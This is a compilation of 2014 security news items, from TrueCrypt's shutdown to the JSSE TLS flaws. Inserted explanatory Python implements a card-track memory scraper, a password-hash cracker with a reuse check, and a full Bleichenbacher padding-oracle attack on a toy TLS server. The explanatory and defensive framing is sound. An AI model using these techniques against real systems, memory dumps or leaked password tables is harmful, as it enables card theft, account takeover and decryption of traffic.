“Using TrueCrypt is not secure”, End of TrueCrypt Development

Source: www.ehackingnews.com


 

Today, security enthusiasts woke up to the shocking news that TrueCrypt development has ended and that the project is warning users the disk-encryption tool is not safe to use.

Users who try to access the official TrueCrypt website are redirected to the project's SourceForge page (truecrypt.sourceforge.net). The page displays the following message:

“WARNING: Using TrueCrypt is not secure as it may contain unfixed security issues”

The message continued: “The development of TrueCrypt was ended in 5/2014 after Microsoft terminated support of Windows XP. Windows 8/7/Vista and later offer integrated support for encrypted disks and virtual disk images. Such integrated support is also available on other platforms.”

The page suggests that users migrate any data encrypted by TrueCrypt to encrypted disks supported on their platform, and it provides steps for migrating to a BitLocker-encrypted drive.

Many, including me, are not able to believe our own eyes. It is uncertain whether it is an official announcement from the development team or someone has hacked the TrueCrypt website.

Matthew Green, who teaches cryptography at Johns Hopkins and is a researcher involved with the TrueCrypt audit, tweeted that he thinks the news is legitimate.

A new binary (TrueCrypt v7.2) was uploaded to the SourceForge page in the last 24 hours. Opening this binary displays a warning message, and the build no longer allows users to create new volumes; it only mounts existing ones. Users are advised not to download this latest version, as it may contain malicious code.

Apple devices ‘hijacked for ransom’

Source: BBC UK

Several users of Apple devices in Australia have reported that their gadgets have been “hijacked” – with a message demanding money.

Experts believe the attackers targeted users by abusing the Find My iPhone feature, which lets whoever controls an Apple ID lock a device remotely and display a message on it.

A message appeared on some targeted phones asking for “$100 USD/EUR” to be sent to a PayPal account.

Mobile networks advised affected users to contact Apple, which denied that its iCloud service had been breached.

“Apple takes security very seriously and iCloud was not compromised during this incident. Impacted users should change their Apple ID password as soon as possible and avoid using the same user name and password for multiple services,” the firm said in a statement to The Register news site.

“Any users who need additional help can contact AppleCare or visit their local Apple Retail Store.”

PayPal has said any funds sent to the specified account would be refunded.

‘Woke me up’

According to the Sydney Morning Herald, the problem spread across much of Australia, with reports of attacks in Queensland, New South Wales, Western Australia, South Australia and Victoria.

Image caption: Apple’s iCloud co-ordinates data across devices but cut one journalist off from his digital life

However, reports have emerged from further afield, with at least one case said to have occurred in London. It involved an Australian visiting on holiday.

Concerned users took to Apple’s support forums, and Twitter, to share details of attacks, which affected iPhones, iPads and, in some cases, Mac laptops.

“This has happened to me too in Brisbane, woke me up half an hour ago,” wrote one user, amberoonie.

“Freaking out as when I opened my laptop it had the same message ‘Device hacked by Oleg Pliss. For unlock device’ with the Find My iPhone icon.”

It is unlikely the hacker would use his real name in the message.

‘Not an option’

Information security consultant Brian Honan told the BBC that so far little is known about the source of the attacks.

He said theories ranged from someone having access to Apple’s systems, to hackers having access to a database of usernames and passwords – perhaps obtained from a third party.

Regardless, he said Apple had to move quickly to reassure users.

“One of the key things, as in any security breach, is being able to communicate proactively with your affected customers,” he said.

“Even just to let them know what you’re doing to deal with the issue can be reassuring.”

New point of sale malware compromises 1500 devices.

Source: www.thehackernews.com

Point of Sale malware
In the past few months, malware developers have focused on spreading and upgrading malware that targets point-of-sale (POS) machines. Because of lax attention and weak security measures, POS systems have become an attractive target for cybercriminals and malware writers.
BlackPOS malware has caused massive data breaches at several US retailers, the largest being the Target breach during last year's Christmas holiday season. Target, the third-largest U.S. retailer, lost data on over 40 million credit and debit cards that had been used to pay for purchases at its roughly 1,500 stores nationwide.
Neiman Marcus and Michaels Stores were also targeted; across these breaches, possibly 110 million card numbers and personal records were compromised. BlackPOS was installed on the POS terminals at checkout counters, where it scraped card data out of the terminal's memory as cards were swiped during transactions, before the data was encrypted for transmission.
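The scraping step is mechanical: a POS terminal must hold the magnetic-stripe data in memory in the clear for a moment, and the malware simply searches process memory for the ISO 7813 track formats and validates hits with the Luhn check. The following Python is an added example, not BlackPOS code or any vendor's detection logic; it runs the same search a defender would run over a memory dump or captured network egress to confirm whether card data was ever present unencrypted. The memory image, PANs (the well-known 4111... and 5555...4444 test numbers) and offsets are constructed.

```python
"""Constructed example: locate magnetic-stripe track data in a memory image,
the way a RAM scraper such as BlackPOS does inside the POS process, and the
way a responder can check a dump for card data that should not be there."""
import re

# Track 2: ;PAN=YYMM<service code><discretionary data>?   (ISO/IEC 7813)
TRACK2 = re.compile(rb";(?P<pan>\d{13,19})=(?P<exp>\d{4})(?P<svc>\d{3})?(?P<dd>\d*)\?")
# Track 1 (format code B): %B<PAN>^<NAME>^YYMM<service code><discretionary>?
TRACK1 = re.compile(rb"%B(?P<pan>\d{13,19})\^(?P<name>[^^]{2,26})\^(?P<exp>\d{4})[^?]*\?")


def luhn_ok(pan: bytes) -> bool:
    """Luhn check-digit validation; rejects most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = ch - 48                      # ASCII digit byte to int
        if i % 2 == 1:                   # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask(pan: bytes) -> str:
    """Keep the BIN and last four digits; never write a full PAN to a report."""
    return pan[:6].decode() + "*" * (len(pan) - 10) + pan[-4:].decode()


def find_card_data(buf: bytes):
    """Yield (offset, track, masked_pan, expiry) for every Luhn-valid hit."""
    for track, rx in (("track1", TRACK1), ("track2", TRACK2)):
        for m in rx.finditer(buf):
            pan = m.group("pan")
            if luhn_ok(pan):
                yield m.start(), track, mask(pan), m.group("exp").decode()


# Constructed memory image: two Luhn-valid test PANs, one Luhn-invalid decoy
# and unrelated process data around them.
SAMPLE_DUMP = (
    b"\x00\x00POSApp 4.2 heap\x00"
    b";4111111111111111=25121011234567890?\x00"
    b"%B5555555555554444^DOE/JANE^2601101000000000?\x00"
    b";4111111111111112=2512101?\x00"        # fails Luhn -> ignored
    b"receipt total 42.17 USD\x00"
)


def scan_report(buf: bytes = SAMPLE_DUMP):
    """Return all card-data hits in buf as a list of tuples."""
    return list(find_card_data(buf))


if __name__ == "__main__":
    for off, track, pan, exp in scan_report():
        print(f"offset {off:5d}  {track}  PAN {pan}  exp {exp}")
```

Run against a real dump, a non-empty report from a terminal that is supposed to use point-to-point encryption is the finding; the Luhn filter keeps the false-positive rate low enough that the same patterns can be used in an egress IDS rule.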

 

eBay Hacked, Urges All Members to Change Passwords Immediately

Source: www.yahoo.com

 

The online auction and sales giant eBay posted a message Wednesday morning saying that it had been hacked, urging all of its members to change their passwords.

The company said in a statement that a database containing encrypted passwords had been breached, but that financial data, including credit card information, was stored separately and was not affected. The attackers first obtained eBay employee log-in credentials, eBay said, which in turn gave them access to the database of encoded passwords.

eBay says that no unauthorized transactions have yet been made with the information. But if you’re an eBay user, you still definitely need a new password.

“[C]hanging passwords is a best practice,” the statement said, “and will help enhance security for eBay users.”

In the statement, which was unsigned, eBay said that the attack took place between late February and early March. eBay described the stolen passwords as encrypted; in practice, a password database holds salted hashes rather than readable passwords, and attackers attempt to recover them offline by hashing candidate passwords and comparing, so weak or reused passwords fall first. eBay did say that the hackers were able to access members’ names, email addresses, physical addresses, phone numbers, and dates of birth.

The real takeaway from this: change your eBay password (go to My eBay and open the Personal Information link you’ll see on the left). If you use the same password on other sites, change those passwords too, since any password the attackers manage to crack will be tried against other services.
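Why a "protected" password database still matters, and why reuse turns one breach into several, is easiest to see by running the attacker's side. The Python below is an added example, not eBay's code or data: the "leaked" table, user names and wordlist are constructed. It cracks an unsalted fast-hash table with one pass over a wordlist, then shows that a salted, slow KDF (PBKDF2-HMAC-SHA256 here, with an iteration count lowered for the demonstration) forces a separate, expensive guess per user and per word.

```python
"""Constructed example: cracking a leaked password table, fast hash vs salted
KDF.  Nothing here is eBay's; users, passwords and wordlist are made up."""
import hashlib
import os

WORDLIST = ["123456", "password", "qwerty", "letmein", "ebay2014", "hunter2"]

# Constructed leak in the worst common format: unsalted SHA-1, one per user.
LEAK_FAST = {
    "alice": hashlib.sha1(b"letmein").hexdigest(),
    "bob": hashlib.sha1(b"ebay2014").hexdigest(),
    "carol": hashlib.sha1(b"T7#qL!zp9wVx").hexdigest(),   # not in any wordlist
}


def crack_fast(leak, wordlist):
    """Unsalted: hash each word once and look every user up in the table."""
    table = {hashlib.sha1(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in leak.items() if h in table}


def pbkdf2_record(password: bytes, iterations: int = 200_000):
    """How the table should be stored: per-user random salt plus a slow KDF."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password, salt, iterations)
    return salt, iterations, digest


def pbkdf2_verify(record, guess: bytes) -> bool:
    salt, iterations, digest = record
    return hashlib.pbkdf2_hmac("sha256", guess, salt, iterations) == digest


def crack_slow(leak_slow, wordlist):
    """Salted: no shared table; every (user, word) pair costs a full KDF run.
    Returns the cracked users and the number of KDF evaluations spent."""
    cracked, work = {}, 0
    for user, record in leak_slow.items():
        for w in wordlist:
            work += 1
            if pbkdf2_verify(record, w.encode()):
                cracked[user] = w
                break
    return cracked, work


def reused_elsewhere(cracked, other_site):
    """Credential stuffing: which cracked passwords also open another site?
    other_site maps user -> password as stored (plaintext only for the demo)."""
    return [u for u, pw in cracked.items() if other_site.get(u) == pw]


if __name__ == "__main__":
    fast = crack_fast(LEAK_FAST, WORDLIST)
    print("unsalted SHA-1 cracked:", fast)
    slow = {u: pbkdf2_record(p, 50_000) for u, p in
            {"alice": b"letmein", "carol": b"T7#qL!zp9wVx"}.items()}
    cracked, work = crack_slow(slow, WORDLIST)
    print(f"PBKDF2 cracked: {cracked} after {work} KDF evaluations")
    print("also valid on other site:", reused_elsewhere(fast, {"alice": "letmein"}))
```

The weak password still falls under PBKDF2; what changes is the cost per guess and the loss of the shared lookup table, which is exactly the margin a user buys by not reusing the password elsewhere.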


And if you’re looking for a strong new password, now is a good time to revisit our guide to creating secure passwords on all your online accounts.

Symantec revamps small business security suite

Source: www.infoworld.com

 

Symantec’s latest product, Norton Small Business, is perhaps the most well-rounded and ambitious offering the company has inserted into its product array for small companies.

The security company has been working for more than a year to revamp its product line as the company faces an ever-competitive security market.

Symantec has at least four products it says are suited for small businesses such as Norton 360 version 6.0, Norton AntiVirus 2012, Norton Internet Security 2012 and Symantec Protection Suite Small Business Edition. All are priced differently and have some overlapping features.

None of those products are being retired but will instead be joined by Norton Small Business, which has been geared to keep up with trends: mobile device security and protection for Apple desktop computers. It is aimed at companies with fewer than 20 employees that are unlikely to have a full-time IT specialist.

Symantec is also offering an ambitious guarantee to Norton Small Business buyers called “Virus Removal Assurance.” It is offering free phone support as part of the guarantee, saying that if its support technicians can’t remove the malicious software, customers can get their money back for the product.

Virus and spyware removal support is a feature of other Symantec products, such as the NortonLive Service, but costs $100 per call. The company claims it is able to remove malware 99.9 percent of the time.

Symantec’s guarantee assumes a customer actually knows they’re infected and that malware has been found on the computer, an increasingly difficult task for consumer-grade security software suites.

For general antivirus protection, Norton Small Business uses Symantec’s Insight and Sonar technologies, which are designed to spot unknown malicious files and programs and classify them based on their reputation and behavior, an approach Symantec says is more effective than relying on signatures alone.

Since mobile devices are increasingly being used by small businesses, the product has several security and device management features, mostly for Android.

The suite will scan Android applications to see if they’re malicious. It also can block calls and text messages from certain numbers and will also scan SD memory cards.

For iOS iPads and iPhones, the features of Norton Small Business are limited due to Apple’s tight control over its devices and what kind of applications users can install. Apple doesn’t allow security applications to be installed on its mobile devices, so the security features offered for Android devices don’t apply to Apple ones.

A product sheet claims that Norton Small Business can track a lost Apple device, but Apple has already incorporated that feature into iOS. It also has a “scream alarm” to locate a missing iOS device that may be within earshot.

The suite supports Apple desktop computers running Mac OS X version 10.7 and later.

Symantec has aimed to make managing the software across devices easy for small business owners, said Anne O’Neill, Symantec’s senior marketing director for North America.

An online management console shows which devices have Norton Small Business installed. Whoever manages a company’s IT security can email “invites” to new employees, which contain a link to download the suite. The product can also be deactivated on a device from the console.

The subscription service starts at $99 for an annual subscription covering five devices, and goes on to $199 for 10 devices and $399 for 20. New devices can be added for $20 annually, with the subscription pro-rated according to the remaining subscription period.

U.S. Charges Five Chinese Military Officers With Spying

Source: Bloomberg

The U.S. dramatically escalated its battle to curb China’s technology theft from American companies by accusing five Chinese military officials of stealing trade secrets, casting the hacker attacks as a direct economic threat.

The indictment effectively accuses China and its government of a vast effort to mine U.S. technology through cyber-espionage, stealing jobs as well as the innovation on which the success of major global companies like United States Steel Corp. (X) and Alcoa Corp. (AA) depends.

While hundreds of U.S. entities have been penetrated by Chinese military hackers since 2002, the Justice Department focused on five companies specializing in solar panels, metals and next-generation nuclear power plants. Four companies are headquartered or have main offices in Western Pennsylvania and officials calculated the toll in human terms.

“The lifeblood of any organization is the people who work, strive and sweat for it,” David Hickton, U.S. Attorney for the Western District of Pennsylvania, said at a news conference in Washington. “When these cyber-intrusions occur, production slows, plants close, workers get laid off and lose their homes.”

The charges, unsealed today in District Court in Pennsylvania, allege the Chinese officers conspired to steal trade secrets and other information from U.S. companies, including Westinghouse Electric Co. and Allegheny Technologies Inc. (ATI) and the United Steel, Paper and Forestry, Rubber, Manufacturing, Energy, Allied Industrial Services Workers International Union.


Pressure Point

The indictments may add a new pressure point in U.S.-China relations, which are strained by Chinese territorial disputes with U.S. allies such as Japan and the Philippines as well as economic competition around the world. While President Barack Obama has said that he welcomes China’s rise as an economic and military power, his administration has sought to increase U.S. presence and influence in the region.

“It’s going to be explosive,” said Paul M. Tiao, a former senior counselor on cybersecurity to FBI director Robert Mueller. “This will have significant diplomatic implications and will affect our relationship with the Chinese government.”

The Chinese government denied engaging in economic espionage and said it would suspend participation in a U.S.- China cyber working group, which was formed last year to discuss rules for cyberspace and as a mechanism to manage differences between the two countries.


“The U.S. accusation against Chinese personnel is purely ungrounded and absurd,” Geng Shuang, spokesman for the Chinese embassy in Washington, said in an e-mail.

‘Aggressive Response’

U.S. Attorney General Eric Holder called the stolen data significant and said the theft “demands an aggressive response.” Hickton said the cost to companies hacked potentially amounts to billions of dollars in lost research and development.

“This cyberhacking leads directly to the loss of jobs here in the United States,” Hickton said. “This 21st Century burglary has to stop.”

Those indicted were officers in Unit 61398 of the Third Department of the Chinese People’s Liberation Army. The Justice Department identified them as Wang Dong, Sun Kailiang, Wen Xinyu, Huang Zhenyu and Gu Chunhui.

In one of the cases, the Justice Department said Sun stole proprietary technical and design specifications for piping from Westinghouse, the nuclear reactor arm of Toshiba Corp. (6502), as the company was building four power plants in China and negotiating other business ventures with state-owned enterprises.

In another instance, Wang and Sun hacked into U.S. Steel computers as the company was participating in trade cases, according to the department’s statement.

Companies Hacked

The indictment appears to be the first public disclosure of some of the intrusions, raising the question why the companies had not disclosed the events to investors.

“To our knowledge, no material information was compromised during this incident, which occurred several years ago,” Monica Orbe, an Alcoa spokeswoman, said in an e-mail today. “Safeguarding our data is a top priority for Alcoa and we continue to invest resources to protect our systems.”

While being spied upon would be a “big honor” and a sign that Solarworld has developed first-rate photovoltaic technology, “it’s a criminal act to steal what we are developing with a lot of money,” Solarworld Chief Executive Frank Asbeck said in a phone interview today.

Sheila Holt, a spokeswoman for the Pittsburgh-based Westinghouse unit of Toshiba, said the company just learned of the indictment. She declined to say whether the company is cooperating with investigators.

Army Links

China-based hackers with links to the People’s Liberation Army have been conducting commercial espionage on Western companies despite the Chinese government’s denial of the accusation last year, Mandiant Corp. (FEYE), the information security firm, said in a report posted April 10 on its website. Mandiant has since been acquired by FireEye Inc.

The hackers, operating since 2006, also stole sensitive communications that would help Chinese competitors in litigation by providing “insight into the strategy and vulnerabilities of the American entity,” the Justice Department said in a statement.

Holder and Robert Anderson, an executive assistant director at the Federal Bureau of Investigation, said every effort will be made to bring the indicted officials to court in Western Pennsylvania.

“This is the new normal,” Anderson said. “This is what you’re going to see on a recurring basis, not just every six months, not just every year.”

Confronting China

The Obama administration decided last year to publicly confront China with claims that it is behind a campaign to hack into U.S. agencies and corporations to steal trade secrets and potentially disrupt computer networks operating banks, power grids and telecommunications networks.

“Success in the global marketplace should be based solely on a company’s ability to innovate and compete, not on a sponsor government’s ability to spy and steal business secrets,” Holder said, emphasizing that U.S. surveillance and spying is not used for commercial purposes.

The Pentagon for the first time in May 2013 accused the Chinese military of intruding into U.S. computers to steal sensitive data.

Wealth Transfer

Former Army General Keith Alexander, who headed the National Security Agency and U.S. Cyber Command, has called the hacking of U.S. trade secrets the greatest transfer of wealth in history.

Despite the push by the Obama administration, no charges had been brought against Chinese officials for hacking. The effort also was overshadowed by documents leaked by former government contractor Edward Snowden last year revealing the extent of NSA spying both domestically and abroad. China maintains that it’s a victim of hacking and opposes such activities.

Hacking activities originating in China temporarily dropped after Mandiant’s first report in February 2013, and by the end of summer the groups returned to “consistent intrusion activity” Mandiant’s latest report said. It said the lull could have been an attempt by the Chinese to assess any political damage following the publication of its report and to reorganize its cyber operations to better hide its activities.

Microsoft acknowledges more errors, 80070371 and 80071A91, when installing Windows 8.1 Update/KB 2919355

There’s confirmation of two more bugs and a Stop 0x7B ‘Blue Screen’ as Microsoft re-issues the patch, changing metadata but no programs

Source: www.infoworld.com


The Windows 8.1 Update blowout continues. We now have official recognition of two more error codes, 80070371 and 80071A91, which can occur when you try to install Windows 8.1 Update, KB 2919355.

These revelations come on the heels of acknowledged errors 800F0922, 800F0923, 80070003, 80070005, 80070490, and 80073712, and the error message “We couldn’t complete the updates, Undoing changes. Don’t turn off your computer.” Microsoft gave workarounds for some (but not all) of those earlier problems on the Microsoft Answers forum earlier this week.

In addition, after installing KB 2919355, Internet Explorer 11 may crash when you turn on or turn off Enterprise Mode, as described in KB 2956283. You may also hit a Stop 0x7B “Blue Screen” error, described in KB 2967012.

Microsoft has re-issued patch KB 2919355 yet again, changing the installation metadata but not the programs themselves. The associated Knowledge Base article is now up to version 21.

Yes, this is the same patch that Microsoft was going to use as a “baseline” for all future Windows 8.1 patches: Up until Monday of this week, Microsoft’s official, oft-repeated policy demanded that customers install KB 2919355 if they wanted any future Windows 8.1 security patches. Fortunately, on May 12 cooler heads prevailed and Microsoft informed Windows 8.1 customers that the threatened Windows 8.1 patch cutoff was a paper tiger — those who didn’t get Windows 8.1 Update/KB 2919355 installed by May 13 would continue to receive updates for another month, until Black Tuesday June 9.

The June 9 cutoff date is now two and a half weeks away. If you can’t get KB 2919355 installed by June 9, Microsoft is threatening (once again) that you won’t be able to get any more patches.

I count 11 known, documented error messages, codes, and crashes for KB 2919355 — and nearly zero definitive solutions. Sure hope Microsoft can solve all those problems by June 9.

It bears repeating, folks: You can’t patch a desktop like a phone.


Critical vulnerabilities in TLS implementation for Java

Source: www.sciencedaily.com


In January and April 2014, Oracle released critical Java security updates. Among other things, they resolve three vulnerabilities discovered by researchers from the Horst Görtz Institute for IT Security at Ruhr-Universität Bochum. These vulnerabilities affect the Java Secure Socket Extension (JSSE), the software library that implements the Transport Layer Security (TLS) protocol in Java. TLS is used to encrypt sensitive information, such as passwords and credit card data, transferred between browsers and web servers.

Similar to Heartbleed

Recently, the Heartbleed vulnerability in OpenSSL, the most widely used TLS implementation, hit the headlines. Like OpenSSL, JSSE is an open source TLS implementation; it is maintained by Oracle. The researchers discovered three weaknesses in the JSSE library, two of which could be used to completely break the confidentiality of TLS-protected traffic. Following the responsible disclosure paradigm, the team of Prof Dr Jörg Schwenk privately informed Oracle about these vulnerabilities before announcing them publicly. The researchers recommend installing Oracle’s updates for applications using JSSE as soon as possible.

How to break TLS in JSSE

JSSE was found vulnerable to so-called Bleichenbacher attacks. First, the researchers intercepted an encrypted communication between a client (e.g. a web browser) and a server; with RSA key exchange, the client’s handshake message carries the premaster secret encrypted under the server’s RSA public key with PKCS#1 v1.5 padding. Then they sent a few thousand modified versions of that ciphertext to the server; each response revealed whether the modified plaintext still had valid padding, and from those yes/no answers they could compute the premaster secret and hence the session keys. Those keys decrypt all data exchanged between client and server in the recorded session (the attack recovers one session’s secret, not the server’s private key, so every recorded session must be attacked separately). The first vulnerability was based on critical information the TLS server leaked through distinct error messages. The second was based on differences in the response time of the JSSE server. Bleichenbacher attacks are complex cryptographic attacks, also referred to as adaptive chosen-ciphertext attacks.
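The following Python is an added example, not code from the Bochum researchers or from JSSE: it implements Bleichenbacher’s algorithm against a simulated TLS server whose distinguishable error (the first of the two vulnerabilities above) serves as the padding oracle, and shows the standard countermeasure beside it. The RSA key (two known primes giving a 125-bit modulus), the server functions `vulnerable_response` and `hardened_response`, and the message `b"pms"` are constructed for the demonstration; the key is deliberately tiny so the attack completes in a few seconds, and the query count it reports is for that toy size.

```python
"""Toy Bleichenbacher (adaptive chosen-ciphertext) attack on RSA PKCS#1 v1.5.
Constructed example: the 'server' is a function, the key is far too small for
real use, and the oracle is the distinguishable-error behaviour described in
the article.  Step numbers follow Bleichenbacher's 1998 paper."""
import secrets

# Constructed toy key: primes 2^61-1 and 2^64-59 give a 125-bit modulus, k = 16.
P, Q, E = (1 << 61) - 1, (1 << 64) - 59, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8                 # RSA block length in bytes


def ceil_div(a, b):
    return -(-a // b)


def pkcs1_v15_pad(msg, k):
    """EME-PKCS1-v1_5: 00 02 || nonzero random padding || 00 || msg."""
    ps = bytes(b or 1 for b in secrets.token_bytes(k - len(msg) - 3))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")


def pkcs1_v15_unpad(m, k):
    block = m.to_bytes(k, "big")
    return block[block.index(b"\x00", 2) + 1:]


def conforming(m, k):
    """The only bit the oracle leaks: does the plaintext start with 00 02?"""
    return m.to_bytes(k, "big")[:2] == b"\x00\x02"


def vulnerable_response(c):
    """Bad padding is reported differently from a handshake that fails later."""
    return "handshake_failure" if conforming(pow(c, D, N), K) else "decrypt_error"


def hardened_response(c):
    """RFC 5246 7.4.7.1: on bad padding continue with a random premaster secret,
    so the handshake fails at Finished exactly as it does for a wrong guess."""
    m = pow(c, D, N)
    _premaster = pkcs1_v15_unpad(m, K) if conforming(m, K) else secrets.token_bytes(4)
    return "handshake_failure"


def narrow(M, s, n, B):
    """Step 3: intersect each interval with the solutions of 2B <= m*s - r*n < 3B."""
    new = set()
    for a, b in M:
        for r in range(ceil_div(a * s - 3 * B + 1, n), (b * s - 2 * B) // n + 1):
            na = max(a, ceil_div(2 * B + r * n, s))
            nb = min(b, (3 * B - 1 + r * n) // s)
            if na <= nb:
                new.add((na, nb))
    return sorted(new)


def bleichenbacher(c, oracle, n, e, k):
    """Recover the padded plaintext of c using only oracle(c') -> bool."""
    B = 1 << (8 * (k - 2))
    queries = [0]

    def conforms(s):                          # query the oracle on c * s^e mod n
        queries[0] += 1
        return oracle((c * pow(s, e, n)) % n)

    # Step 1 (blinding) is skipped: c is already conforming, so s0 = 1.
    M = [(2 * B, 3 * B - 1)]
    s = ceil_div(n, 3 * B)                    # Step 2a: smallest conforming s1
    while not conforms(s):
        s += 1
    while True:
        M = narrow(M, s, n, B)
        if len(M) == 1 and M[0][0] == M[0][1]:
            return M[0][0], queries[0]        # Step 4: m = a (no unblinding, s0 = 1)
        if len(M) > 1:                        # Step 2b: several intervals, step s
            s += 1
            while not conforms(s):
                s += 1
            continue
        a, b = M[0]                           # Step 2c: one interval, jump via r
        r = ceil_div(2 * (b * s - 2 * B), n)
        while True:
            lo, hi = ceil_div(2 * B + r * n, b), (3 * B - 1 + r * n) // a
            hit = next((t for t in range(lo, hi + 1) if conforms(t)), None)
            if hit is not None:
                s = hit
                break
            r += 1


def demo(msg=b"pms"):
    """Encrypt msg to the toy server, then recover it through the error oracle."""
    c = pow(pkcs1_v15_pad(msg, K), E, N)
    oracle = lambda x: vulnerable_response(x) == "handshake_failure"
    m, queries = bleichenbacher(c, oracle, N, E, K)
    return pkcs1_v15_unpad(m, K), queries


if __name__ == "__main__":
    recovered, q = demo()
    print(f"recovered {recovered!r} after {q} oracle queries")
```

The timing variant the researchers also found is the same attack with the oracle replaced by a stopwatch; the fix in both cases is `hardened_response`: make the server's behaviour, including its timing, identical whether or not the padding was valid, so the attacker's loop has nothing to branch on.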

April patch from Oracle solves another problem

The April patch provided by Oracle also fixes the implementation of another cryptographic algorithm, RSA-OAEP (PKCS#1 v2.1), which was vulnerable to a different adaptive chosen-ciphertext attack. This algorithm is not used in TLS but in other security-critical applications, such as Web Services.

Snapchat Lied about privacy, saved your selfie images and videos on their server

Source: www.hackread.com

 

Snapchat has agreed to settle the deception charges leveled against it by the Federal Trade Commission (FTC) without admitting or denying any wrongdoing, according to an official statement released on Thursday.

As part of the settlement, the company is required to implement a privacy program monitored by an outside privacy expert for the next 20 years.

This settlement is similar to arrangements endorsed by Google, Facebook, and Myspace.

The FTC had complained that Snapchat made ‘multiple misrepresentations to consumers about its product that stood in stark contrast to how the app actually worked.’


Other charges slapped against Snapchat included:

  • It stored video snaps unencrypted on the recipient’s device in a location outside the app’s ‘sandbox’
  • Misrepresentation of data collection practices
  • Collection of iOS users’ contact information from their address books without their consent: during registration, the app prompted users to enter their mobile number to find their friends on Snapchat. It informed users that the app would collect their email, phone numbers, and Facebook ID. However, it also collected the names and phone numbers of all the contacts in the device’s address book without the users’ permission.
  • Failure to secure its ‘Find Friends’ feature, which resulted in a security breach that allowed attackers to collect the usernames and phone numbers of 4.6 million Snapchat users. The app was later updated to give users an option to opt out of the Find Friends feature.

Snapchat is a widely used messaging app that promises privacy and security because messages exchanged through its servers do not stay there forever but disappear after the recipient has viewed them.

However, the FTC claimed that messages did not disappear: conversations, images and videos could easily be saved by third-party applications, and the application’s promises were misleading.

The FTC recorded several cases of misrepresentation by the messaging company. Recipients could easily access the videos once they connected their mobile device to a computer and navigated the device’s file directory. The FTC also found a false claim that the sender would receive a notification whenever the recipient tried to take a screenshot of the video or message: a recipient using an Apple device running a version prior to iOS 7 could evade the screenshot detection.

Additionally, the Snapchat’s Android application transmitted geolocation information of its users, observed the FTC.

Edith Ramirez, FTC Chairwoman, said,

“If a company markets privacy and security as key selling points in pitching its service to consumers, it is critical that it keep those promises”

She added further,

“Any company that makes misrepresentations to consumers about its privacy and security practices risks FTC action.”

The Snapchat settlement is part of the FTC’s ongoing effort to ensure privacy promises maintained truthfully by the application manufacturers.

Although the settlement has no financial component, any further violation is punishable by a civil penalty of up to USD 16,000 each.

The FTC plans to publish a description of the consent agreement package soon, which will be available for public comments till 9 June, 2014.

Snapchat, on its blog on Thursday, said

“This morning we entered into a consent decree with the FTC that addresses concerns raised by the commission. We continue to invest heavily in security and countermeasures to prevent abuse,” the blog post read.

They also said their main focus was to develop ‘a unique, fast way to communicate with photos’ and in doing so,

“some things didn’t get the attention they could have. One of those was being more precise with how we communicated with the Snapchat community.”

However, the company blog reiterated,

“We are devoted to promoting user privacy and giving Snapchatters control over how and with whom they communicate. That’s something we’ve always taken seriously, and always will.”

Snapchat is a Los Angeles-based company run by Evan Spiegel and Bobby Murphy, two Stanford alumni.

Released in 2011, the service quickly gained a following and now claims to transmit 700 million messages every day.

But is privacy and security in an online environment a plausible desire?

Security researchers firmly believe that anything sent over the Internet stands a chance of being intercepted and that anything posted on the Internet remains there forever.

“The Internet is forever, and people don’t realize that. You think you can delete a tweet or a Facebook post, but it doesn’t go away. Most people don’t know how hard it is to make a message disappear,” Nico Sell, a security expert and one of the founders of the rival mobile messaging app Wickr, told The New York Times.

Microsoft sticks to vow, leaves XP exposed to ongoing attacks

Source: www.computerworld.com

Hackers are exploiting an Internet Explorer (IE) vulnerability that Microsoft patched on Tuesday for supported versions of Windows but left unpatched in Windows XP, Microsoft and outside security experts said.

The bug, identified as CVE-2014-1815, was one of two Microsoft patched with a critical update issued Tuesday for IE6, IE7, IE8, IE9, IE10 and IE11. In the accompanying security bulletin, Microsoft noted that the vulnerability had been both known to hackers and used by them prior to yesterday’s update.

“Microsoft is aware of limited attacks that attempt to exploit this vulnerability in Internet Explorer,” the bulletin stated.

But because Windows XP reached the end of its support last month, users running the aged operating system did not receive the IE security update, unlike owners of Windows Vista, Windows 7 and Windows 8 PCs.

Windows XP lives


Also on Tuesday, Microsoft reasserted that it has patched its last Windows XP bug. In the strongest signal yet that it will stick with its plan — and that a May 1 emergency patch for IE on XP had been a one-time deal — a company spokesman said, “The Windows XP end of support policy still remains in place moving forward.”

Originally, Windows XP was bundled with IE6, but over the years users have upgraded to IE7 and then IE8, the five-year-old browser that is the newest from Microsoft able to run on XP. If XP were still supported, XP PCs would certainly have received the update.

“This is the first advisory that clearly would have applied to Windows XP,” said Ross Barrett, senior manager of security engineering at Rapid7, in an email yesterday. “IE6, IE7 and IE8 are vulnerable on Windows [Server] 2003; this would historically have mapped to the same scope of XP patches, but not this time.”

As Barrett noted, Microsoft’s security bulletin listed Windows Server 2003 as affected by the vulnerability. The server software was patched Tuesday because its support lifespan runs until July 14, 2015.

CVE-2014-1815 is a classic “drive-by” vulnerability that can be triggered simply by duping IE users into visiting a malicious or compromised website. As soon as an unpatched Internet Explorer renders such a page, the exploit runs without any further user interaction, executing code with the rights of the logged-in user and installing malware on the PC.

Because IE6, IE7 and IE8 on Windows XP will not be patched, users of those browsers will remain vulnerable to such attacks indefinitely.

Most security professionals have urged people stuck on XP to switch to another browser, one that still receives updates: Google’s Chrome, Mozilla’s Firefox and Opera Software’s Opera all fit that bill. According to research conducted by Computerworld, XP users can dramatically lower their risk by dumping IE.

Other vulnerabilities patched by Microsoft yesterday were also left unfixed in Windows XP. “We can assume that any vulnerability that [was] for Windows Server 2003 is applicable to XP as well. For this month, that means at least: MS12-029 (IE), MS12-024 (ASLR), and MS12-025 (Group Profile),” said Wolfgang Kandek, chief technology officer at Qualys, in an email.

Together, those three security updates patched four vulnerabilities out of the month’s total of 13.

For people who cannot give up IE, Microsoft provided workarounds it said would help ward off attacks, including those aimed at the browser when it’s running on Windows XP. However, the workarounds have negative side effects that may make some websites unusable, Microsoft warned. The security bulletin MS14-029 includes those workaround instructions.

Another stop-gap users can deploy is the Enhanced Mitigation Experience Toolkit (EMET), a free anti-exploit utility that works on Windows XP. EMET 4.1 can be downloaded from Microsoft’s website.

